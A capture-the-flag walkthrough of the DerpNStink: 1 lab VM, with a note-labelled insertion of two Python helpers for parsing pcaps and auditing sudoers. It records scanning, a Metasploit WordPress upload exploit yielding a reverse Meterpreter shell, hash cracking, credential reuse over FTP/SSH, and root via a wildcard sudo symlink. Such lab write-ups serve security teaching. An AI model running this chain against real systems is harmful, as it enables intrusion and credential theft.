Derpnstink: 1 Walkthrough

Walkthrough for the DerpNStink: 1 (https://www.vulnhub.com/entry/derpnstink-1,221/) CTF challenge image.

Summary

Flags

| Flag | Where it was found |
|------|--------------------|
| flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) | In the source of the main html page |
| flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6) | In the wp_posts database table |
| flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb) | In flag.txt on the desktop of user stinky |
| flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd) | In flag.txt of root's home directory |

Domains

  • derpnstink.local

Credentials

| Service | Username | Password | Notes |
|---------|----------|----------|-------|
| WordPress | admin | admin | Does not give access to pretty much anything |
| WordPress | unclestinky | wedgie57 | Gives access to the WordPress admin console |
| Linux (ssh) | mrderp | derpderpderpderpderpderpderp | Requires a key to log in via ssh (not found yet). Account does not work on ftp. |
| Linux (ssh / ftp) | stinky | wedgie57 | Requires a key to log in via ssh (found via accessing ftp) |

Walkthrough

A basic nmap ping scan finds the box. Throwing a fuller scan at it finds three services open and some details.

[bash]
root@kali:~# nmap -A -T4 192.168.195.214

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-20 14:44 AEDT
Nmap scan report for 192.168.195.214
Host is up (0.00080s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 00:0C:29:2F:D8:BE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.80 ms 192.168.195.214

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.63 seconds
[/bash]

A preliminary Google search on each of the service versions doesn’t yield anything terrifically interesting. An initial probe of each service gives us:

  • vsftpd doesn’t allow anonymous login.
  • OpenSSH requires an ssh key to log in.
  • Apache serves an initial landing page with an interesting graphical effect.
  • robots.txt gives me two directories – /php/ (permission denied when I try to load it) and /temporary/ (which just returns the message "Try Harder").

Running a dirb scan across the web server and filtering for HTTP 200 responses (file found) gives some better clues.

[bash]
root@kali:~/Documents/dirpnstink# cat dirpnstink_dirb | grep 200
+ http://192.168.195.214/index.html (CODE:200|SIZE:1298)
+ http://192.168.195.214/robots.txt (CODE:200|SIZE:53)
+ http://192.168.195.214/php/info.php (CODE:200|SIZE:0)
+ http://192.168.195.214/temporary/index.html (CODE:200|SIZE:12)
+ http://192.168.195.214/weblog/index.php (CODE:200|SIZE:14678)
+ http://192.168.195.214/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://192.168.195.214/javascript/jquery/version (CODE:200|SIZE:5)
+ http://192.168.195.214/php/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.195.214/php/phpmyadmin/index.php (CODE:200|SIZE:8268)
+ http://192.168.195.214/php/phpmyadmin/phpinfo.php (CODE:200|SIZE:8270)
+ http://192.168.195.214/weblog/wp-content/index.php (CODE:200|SIZE:0)
+ http://192.168.195.214/weblog/wp-content/plugins/index.php (CODE:200|SIZE:0)
+ http://192.168.195.214/weblog/wp-content/themes/index.php (CODE:200|SIZE:0)
+ http://192.168.195.214/weblog/wp-includes/js/swfobject.js (CODE:200|SIZE:10231
[/bash]

The landing index.html file wouldn’t let me get to the html source directly in the browser on account of the background effect. Pulling the file down via wget and examining the code directly yields the first flag – flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166).

Browsing to the two other URLs yields a WordPress site and a phpmyadmin instance. The WordPress site automatically redirects to a hostname (derpnstink.local) – added to the hosts file and to my notes in case it becomes important later.

Running wpscan against the WordPress blog yields a number of vulnerabilities. Reviewing the output, we have a seriously out-of-date WordPress plugin.

[bash]
[+] Enumerating plugins from passive detection …
| 1 plugin found:

[+] Name: slideshow-gallery – v1.4.6
| Last updated: 2017-07-17T09:36:00.000Z
| Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
| Readme: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
[!] The version is out of date, the latest version is 1.6.7.1

[!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
Reference: https://wpvulndb.com/vulnerabilities/7532
Reference: http://seclists.org/bugtraq/2014/Sep/1
Reference: http://packetstormsecurity.com/files/131526/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
Reference: https://www.exploit-db.com/exploits/34681/
Reference: https://www.exploit-db.com/exploits/34514/
[i] Fixed in: 1.4.7
[/bash]

CVE-2014-5460 looks to be the easier way in (and comes with its own Metasploit module). Unfortunately, to exploit it you need valid credentials for any WordPress user. Enumerating users with wpscan gives us two (admin and unclestinky). An initial guess at the admin password (admin) gets us in on the first attempt.

Off now to Metasploit. After setting all the options we have a shell.

[bash]
[*] Meterpreter session 1 opened (192.168.195.212:4444 -> 192.168.195.214:60896) at 2018-03-20 15:13:15 +1100
[+] Deleted zecflkbr.php
meterpreter > ls
Listing: /var/www/html/weblog/wp-content/uploads/slideshow-gallery
==================================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 4096 dir 2017-11-13 14:43:29 +1100 cache
100644/rw-r--r-- 108987 fil 2017-11-13 14:45:12 +1100 derp.png
100644/rw-r--r-- 1114 fil 2017-12-13 08:44:11 +1100 elidumfy.php

meterpreter >
[/bash]

Browsing around gives us two things of interest.

  • The main unix accounts are mrderp and stinky (confirmed by checking the /home directory and the /etc/passwd file).
  • Reviewing the wp-config.php file gives us the mysql login: root (username) and mysql (password). Checking this on the phpmyadmin page works.

Digging through the mysql databases gives two pieces of information. First is the second flag – flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6) (found in the wp_posts table) and second is the WordPress password hashes.

The next step was to throw both usernames at the ftp service. It didn’t like the username mrderp (gives a permission denied – 530 error) but it does prompt for a password for user stinky. Throwing hydra at the ftp service with username stinky and Metasploit’s unix_password wordlist didn’t yield any luck, so on to exploring the hashes.

Throwing both hashes at hashcat (mode 400, phpass, using the default Kali rockyou.txt wordlist) gives fairly rapid results.

[bash]
hashcat -a 0 -m 400 hashes rockyou.txt hashcat

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/:admin
$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41:wedgie57

Session..........: hashcat
Status...........: Cracked
Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target......: hashes
Time.Started.....: Mon Mar 12 18:47:52 2018 (1 min, 12 secs)
Time.Estimated...: Mon Mar 12 18:49:04 2018 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....: 49402 H/s (6.58ms) @ Accel:32 Loops:8 Thr:256 Vec:1
Recovered........: 2/2 (100.00%) Digests, 2/2 (100.00%) Salts
Progress.........: 6291456/28688770 (21.93%)
Rejected.........: 0/6291456 (0.00%)
Restore.Point....: 2752512/14344385 (19.19%)
Candidates.#2....: wildcat79 -> tomaboi

Started: Mon Mar 12 18:47:45 2018
Stopped: Mon Mar 12 18:49:05 2018
[/bash]

Going through the WordPress admin page with both logins doesn’t yield a lot of interest. The admin credentials don’t give access to anything (it seems to be an ordinary account). The unclestinky credentials give access to the full WordPress admin page, but there is nothing here of much interest.

Given there is a similar unix username (unclestinky -> stinky), heading over to ftp with that username and the cracked password gives us two things of interest.

[bash]
220 (vsFTPd 3.0.2)
Name (192.168.195.214:root): stinky
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd files/ssh/ssh/ssh/ssh/ssh/ssh/ssh
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 1675 Nov 13 05:22 key.txt
226 Directory send OK.
ftp> cd /files
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 1001 1001 4096 Nov 12 17:23 network-logs
drwxr-xr-x 3 1001 1001 4096 Nov 12 16:36 ssh
-rwxr-xr-x 1 0 0 17 Nov 12 14:06 test.txt
drwxr-xr-x 2 0 0 4096 Nov 12 17:23 tmp
226 Directory send OK.
ftp> cd network-logs
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 719 Nov 12 17:23 derpissues.txt
[/bash]

Downloading and reading each of the three text files gives us an ssh key and a conversation between the two users about issues found (the issues explain why user derp doesn’t have a working WordPress account – not certain if this is relevant).

Using the private key found from the ftp dig, we now have an ssh shell.

[bash]
root@kali:~/Documents/dirpnstink# ssh -i key.txt stinky@192.168.195.214
Ubuntu 14.04.5 LTS
Last login: Mon Nov 13 00:31:29 2017 from 192.168.1.129
stinky@DeRPnStiNK:~$
[/bash]

Digging around yields a pcap file in the Documents directory and flag3 – flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb) in the file flag.txt on the desktop.

User stinky can’t sudo (no easy win there) and both user home directories are locked down to their respective owners, so there is no browsing into what mrderp has.

The pcap file was extracted via sftp for investigation. The derpissues.txt file found on the ftp server confirms there were issues that the users took a pcap to resolve, so I’m assuming flag4 is in here.

Initial investigation shows a lot of failed traffic going to a local DNS server. Probing it from the shell confirms a local DNS server is running; it couldn’t be seen remotely as it is bound to localhost.

Digging a bit further through the capture we find an interesting piece: user mrderp was added to the WordPress instance with a password of derpderpderpderpderpderpderp. Logging back in as stinky via ssh and changing users via su, we have a match.
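The pcap step above, as an added example that is not from the original post: a dependency-free parser that walks a classic libpcap file and pulls credential fields out of cleartext HTTP POST bodies, which is exactly what makes the WordPress user creation recoverable from a capture. The pcap bytes are constructed inline (zeroed MACs, no checksums); the field names are WordPress's own form fields (user_login/pass1 for user-new.php, log/pwd for wp-login.php), while the addresses and values are made up.

```python
import struct
from urllib.parse import parse_qs

# Constructed single-packet pcap: an HTTP POST of the kind WordPress's user-new.php
# form sends. The field names are WordPress's; addresses and values are made up.
_BODY = b"action=createuser&user_login=mrderp&pass1=sample-password-1&role=subscriber"
_HTTP = (b"POST /weblog/wp-admin/user-new.php HTTP/1.1\r\nHost: derpnstink.local\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Content-Length: %d\r\n\r\n" % len(_BODY) + _BODY)
_ETH = bytes(12) + b"\x08\x00"                          # zeroed MACs, EtherType IPv4
_IP = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(_HTTP), 1, 0, 64, 6, 0,
                  bytes([192, 168, 1, 129]), bytes([127, 0, 0, 1]))  # checksum left 0
_TCP = struct.pack("!HHIIBBHHH", 50000, 80, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
_PKT = _ETH + _IP + _TCP + _HTTP
SAMPLE_PCAP = (struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
               + struct.pack("<IIII", 1510540800, 0, len(_PKT), len(_PKT)) + _PKT)

def tcp_payloads(pcap):
    """Yield (dst_port, payload) for each IPv4/TCP frame in a classic libpcap file."""
    endian = "<" if pcap[:4] == b"\xd4\xc3\xb2\xa1" else ">"
    off = 24                                             # skip the global header
    while off + 16 <= len(pcap):
        caplen = struct.unpack(endian + "I", pcap[off + 8:off + 12])[0]
        frame = pcap[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if frame[12:14] != b"\x08\x00" or frame[23] != 6:  # IPv4 and TCP only
            continue
        tcp = frame[14 + (frame[14] & 0x0F) * 4:]        # skip the IP header (IHL)
        data_off = (tcp[12] >> 4) * 4                    # TCP header length
        yield struct.unpack("!H", tcp[2:4])[0], tcp[data_off:]

def find_cleartext_credentials(pcap, fields=("log", "pwd", "user_login", "pass1")):
    """Return (port, path, {field: value}) for HTTP POST bodies carrying credential fields."""
    hits = []
    for port, payload in tcp_payloads(pcap):
        if not payload.startswith(b"POST ") or b"\r\n\r\n" not in payload:
            continue
        head, body = payload.split(b"\r\n\r\n", 1)
        path = head.split(b" ", 2)[1].decode(errors="replace")
        form = parse_qs(body.decode(errors="replace"))
        found = {k: form[k][0] for k in fields if k in form}
        if found:
            hits.append((port, path, found))
    return hits
```

Run over a real capture, any hit on port 80 is a credential that travelled unencrypted; the fix on the defender side is serving wp-admin over TLS only.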

[bash]
root@kali:~/Documents/dirpnstink# ssh -i key.txt stinky@derpnstink.local
stinky@DeRPnStiNK:~$ su mrderp
Password:
mrderp@DeRPnStiNK:/home/stinky$ cd ~/
mrderp@DeRPnStiNK:~$ ls
Desktop Documents Downloads
[/bash]

Poking around further gives us an ssh key and a helpdesk.log file on the user’s desktop. The ssh key checked (it works) but asks for the user’s local password after logging in (odd). The helpdesk.log file gives us a pastebin url (https://pastebin.com/RzK9WfGw). Browsing to the page we have one string of raw paste text – “mrderp ALL=(ALL) /home/mrderp/binaries/derpy*”.

A short Google search confirms that is the format of a sudoers entry. Logic suggests mrderp can run things via sudo (as any user, including root) that sit at that path.
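To show why that sudoers entry is a problem from an audit standpoint, an added example that is not part of the original walkthrough: a small checker that parses user specifications and flags command paths that contain wildcards or live under the user's own home directory (both true of the line from the paste). The parser handles only the common line shape, and the sample sudoers text is constructed around that line.

```python
import re

GLOB_CHARS = set("*?[")

# Constructed sudoers excerpt: the mrderp line is the one from the paste; the others are made up.
SAMPLE_SUDOERS = """root ALL=(ALL:ALL) ALL
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*
stinky ALL=(root) NOPASSWD: /usr/bin/apt-get update
"""

def parse_sudoers_line(line):
    """Parse the common shape  USER HOSTS=(RUNAS) [TAG:] cmd, cmd ...  (not the full grammar)."""
    m = re.match(r"^\s*(\S+)\s+(\S+?)\s*=\s*(?:\(([^)]*)\))?\s*(.*)$", line)
    if not m:
        return None
    user, hosts, runas, rest = m.groups()
    tags, cmds = [], []
    for spec in rest.split(","):
        spec = spec.strip()
        while ":" in spec and spec.split(":", 1)[0].isupper():   # NOPASSWD:, SETENV: ...
            tag, spec = spec.split(":", 1)
            tags.append(tag)
            spec = spec.strip()
        cmds.append(spec)
    return {"user": user, "hosts": hosts, "runas": runas or "root", "tags": tags, "commands": cmds}

def audit_command(user, cmd):
    """Least-privilege problems in one command spec; returns a list of risk strings."""
    path = cmd.split()[0] if cmd.strip() else ""
    if path == "ALL":
        return ["grants every command"]
    risks = []
    if GLOB_CHARS & set(path):
        risks.append("wildcard in command path: the user picks which file runs")
    if path.startswith((f"/home/{user}/", "/tmp/", "/var/tmp/")):
        risks.append("command lives in a directory the user can write to")
    return risks

def audit_sudoers(text):
    """Return (user, command, risk) tuples for every risky command spec in the file."""
    findings = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line: continue
        entry = parse_sudoers_line(line)
        for cmd in (entry or {}).get("commands", []):
            for risk in audit_command(entry["user"], cmd):
                findings.append((entry["user"], cmd, risk))
    return findings
```

The safe shape of such a rule is a fixed, root-owned path with no glob, which is what either finding points at.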

[bash]
mrderp@DeRPnStiNK:~/binaries$ ln -s /usr/sbin/visudo derpy1
mrderp@DeRPnStiNK:~/binaries$ ls -al
total 8
drwxrwxr-x 2 mrderp mrderp 4096 Apr 2 02:36 .
drwx—— 12 mrderp mrderp 4096 Apr 2 02:35 ..
lrwxrwxrwx 1 mrderp mrderp 16 Apr 2 02:36 derpy1 -> /usr/sbin/visudo
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy1
[sudo] password for mrderp:
mrderp@DeRPnStiNK:~/binaries$ sudo su -
root@DeRPnStiNK:~# ls
Desktop Documents Downloads
root@DeRPnStiNK:~# cd ~/
root@DeRPnStiNK:~# ls
Desktop Documents Downloads
root@DeRPnStiNK:~# cd Desktop/
root@DeRPnStiNK:~/Desktop# ls
flag.txt
root@DeRPnStiNK:~/Desktop# cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!

@securekomodo

root@DeRPnStiNK:~/Desktop#
[/bash]

A quick experiment later and we are all done.